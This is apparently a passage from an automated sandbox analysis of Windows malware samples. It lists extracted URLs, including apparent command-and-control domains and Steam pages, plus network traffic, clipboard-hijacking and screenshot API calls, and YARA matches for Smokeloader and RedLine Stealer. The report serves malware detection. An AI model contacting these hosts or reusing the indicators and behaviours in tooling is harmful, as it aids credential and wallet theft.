Source: 5759.tmp.exe, 00000001.00000003.1861891488.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1861926485.0000000000A42000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deafeninggeh.biz/apiyis
Source: 5759.tmp.exe, 00000001.00000003.1861780712.0000000000A24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deafeninggeh.biz:443/apipp
Source: 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://debonairnukk.xyz/apieg
Source: 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://effecterectz.xyz/api
Source: 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: 5759.tmp.exe, 00000001.00000003.1861891488.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://immureprech.biz/
Source: 5759.tmp.exe, 00000001.00000002.2124450626.00000000009F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://immureprech.biz/api
Source: 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: wN8pQhRNnu.exe, 00000000.00000002.4130595002.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, wN8pQhRNnu.exe, 00000000.00000003.4008558725.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/
Source: wN8pQhRNnu.exe, 00000000.00000002.4130595002.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, wN8pQhRNnu.exe, 00000000.00000003.4008558725.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/dwP
Source: wN8pQhRNnu.exe	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=
Source: wN8pQhRNnu.exe, 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
Source: wN8pQhRNnu.exe, 00000000.00000002.4130595002.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, wN8pQhRNnu.exe, 00000000.00000003.4008558725.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
Source: wN8pQhRNnu.exe, 00000000.00000002.4130595002.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, wN8pQhRNnu.exe, 00000000.00000003.4008558725.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE:O
Source: 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sordid-snaked.cyou/apih
Source: 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/=0&c
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: 5759.tmp.exe, 00000001.00000002.2124499650.0000000000A07000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/fJ
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124450626.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: 5759.tmp.exe, 00000001.00000003.1906495204.0000000000A7A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124450626.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: 5759.tmp.exe, 00000001.00000002.2124616833.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900GSg
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: 5759.tmp.exe, 00000001.00000002.2124616833.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: 5759.tmp.exe, 00000001.00000002.2124616833.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
Source: 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124450626.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906525487.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wrathful-jammy.cyou/2
Source: 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wrathful-jammy.cyou/api
Source: 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wrathful-jammy.cyou/apiB
Source: 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: 5759.tmp.exe, 00000001.00000003.1906434407.0000000003061000.00000004.00000800.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: 5759.tmp.exe, 00000001.00000003.1906461785.0000000000A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736

Source: unknown	HTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.22.222:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49736 version: TLS 1.2

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe

Code function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,

0_2_004016DF

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,		0_2_004016DF
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_02471942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,		0_2_02471942

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe

0_2_004016DF

Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe

Code function: 1_2_00431839 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

1_2_00431839

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.4130543835.00000000009E9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000001.00000002.2124427014.00000000009BA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_02472361 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,		0_2_02472361
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_02472605 NtdllDefWindowProc_W,PostQuitMessage,		0_2_02472605

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_00428022	0_2_00428022
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_004071AB	0_2_004071AB
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_004373D9	0_2_004373D9
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_0042D4EE	0_2_0042D4EE
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_00427484	0_2_00427484
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_00428560	0_2_00428560
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_004166AF	0_2_004166AF
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_00413725	0_2_00413725
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_004277F6	0_2_004277F6
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_0040E974	0_2_0040E974
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_0042EAE0	0_2_0042EAE0
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_00427AA0	0_2_00427AA0
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_00418AAF	0_2_00418AAF
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_00436CBF	0_2_00436CBF
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_00427D67	0_2_00427D67
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_00413F0B	0_2_00413F0B
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_02498289	0_2_02498289
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_0249ED47	0_2_0249ED47
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_02484172	0_2_02484172
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_024976EB	0_2_024976EB
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_0249D755	0_2_0249D755
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_024987C7	0_2_024987C7
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_02497A5D	0_2_02497A5D
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_0247EBDB	0_2_0247EBDB
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_02486916	0_2_02486916
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_0248398C	0_2_0248398C
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_024A6F26	0_2_024A6F26
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_02497FCE	0_2_02497FCE
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_0249ED47	0_2_0249ED47
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_02497D07	0_2_02497D07
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_02488D16	0_2_02488D16
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0040B44C	1_2_0040B44C
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00408790	1_2_00408790
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00426054	1_2_00426054
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0043B068	1_2_0043B068
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00414070	1_2_00414070
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0043C020	1_2_0043C020
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00439830	1_2_00439830
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0043D830	1_2_0043D830
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0041B0E1	1_2_0041B0E1
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0041F0E0	1_2_0041F0E0
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_004210E0	1_2_004210E0
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00435890	1_2_00435890
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00434098	1_2_00434098
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0043D0A0	1_2_0043D0A0
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_004180A9	1_2_004180A9
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0040A940	1_2_0040A940
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0041714B	1_2_0041714B
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0040C917	1_2_0040C917
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0042B12C	1_2_0042B12C
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0042F130	1_2_0042F130
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0042B1C0	1_2_0042B1C0
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0041D9E0	1_2_0041D9E0
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_004361E0	1_2_004361E0
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_004111E5	1_2_004111E5
